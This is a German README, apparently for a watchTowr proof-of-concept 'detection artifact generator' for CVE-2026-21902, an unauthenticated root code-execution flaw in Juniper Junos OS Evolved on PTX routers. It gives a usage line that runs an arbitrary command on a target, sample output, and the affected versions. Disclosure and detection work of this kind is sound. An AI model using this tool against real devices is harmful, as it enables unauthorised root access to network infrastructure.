
Generator für Erkennungsartefakte für Juniper Junos Evolved CVE-2026-21902.
https://github.com/user-attachments/assets/a7d667e1-7636-4097-ab3f-838944cdcccc
Weitere technische Details finden Sie in unserem Blogbeitrag.
python .\watchTowr-vs-JunosEvolved-CVE-2026-21902.py 127.0.0.1 -c "id > /var/home/admin/watchTowr.txt"
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-JunosEvolved-CVE-2026-21902.py
(*) Generator für Erkennungsartefakte für nicht authentifizierte Remote-Codeausführung bei Juniper JunosEvolved
- McCaulay (@_mccaulay) von watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-21902]
[+] BEFEHL cmd1 erstellt
[+] DAG dag1 erstellt
[+] DAG-INSTANZ instance1 erstellt
[+] Konfiguration übernommen...
[#] Warten auf Befehlsausführung...
[+] Befehl ausgeführt, prüfen Sie das Ziel auf Ergebnisse!
Dieses Skript versucht zu erkennen, ob Junos Evolved OS & PTX Series anfällig für CVE-2026-21902 ist.
Dieses Problem betrifft Junos OS Evolved auf der PTX-Serie:
Dieses Problem betrifft keine Junos OS Evolved-Versionen vor 25.4R1-EVO.
Dieses Problem betrifft nicht Junos OS.
Weitere Informationen finden Sie im Advisory Junos OS Evolved: PTX Series: Eine Schwachstelle ermöglicht es einem nicht authentifizierten, netzwerkbasierten Angreifer, Code als root auszuführen.
Für die neueste Sicherheitsforschung folgen Sie dem watchTowr Labs Team